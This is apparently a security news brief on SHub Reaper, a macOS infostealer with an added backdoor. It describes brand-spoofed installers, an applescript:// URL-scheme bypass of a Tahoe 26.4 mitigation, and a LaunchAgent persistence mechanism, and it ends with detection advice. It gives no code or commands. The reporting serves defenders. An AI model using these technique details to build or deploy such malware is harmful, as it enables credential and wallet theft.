Stealer Spoofs Google, Microsoft & Apple, Then Backdoors macOS

MacOS‑focused threat actors have long relied on simple click‑fix tricks to harvest credentials, but the emergence of SHub Reaper signals a new level of sophistication. By coupling classic infostealer functions—credential harvesting, crypto‑wallet hijacking, and document exfiltration—with a lightweight backdoor, the malware transforms a quick‑grab operation into a persistent foothold. This hybrid design reflects a broader trend where attackers seek long‑term value from a single infection, leveraging the high‑value enterprise credentials often stored on Apple devices.

The infection chain is notable for its multibrand spoofing. Victims encounter fake WeChat and Miro installers hosted on typosquatted Microsoft domains, then see the payload masquerade as an Apple security update before persisting in a faux Google Software Update folder. Crucially, SHub Reaper sidesteps Apple’s Tahoe 26.4 mitigation by invoking the applescript:// URL scheme, loading malicious AppleScript directly in Script Editor. This living‑off‑the‑land technique avoids introducing foreign binaries, evading XProtect and many endpoint scanners while establishing a LaunchAgent that beacons every 60 seconds for command execution.

For security teams, the shift demands new detection lenses. Traditional alerts focused on terminal commands or suspicious binaries will miss the subtle Script Editor launches, osascript‑curl chains, and unusual LaunchAgent naming patterns. Organizations should enrich EDR policies to flag AppleScript URL handlers, monitor for unexpected invocations of Script Editor, and audit Google‑style update directories for rogue files. As macOS continues to gain market share in enterprise environments, adapting defenses to these layered, brand‑spoofing tactics will be essential to protect credentials and prevent lateral movement across corporate networks.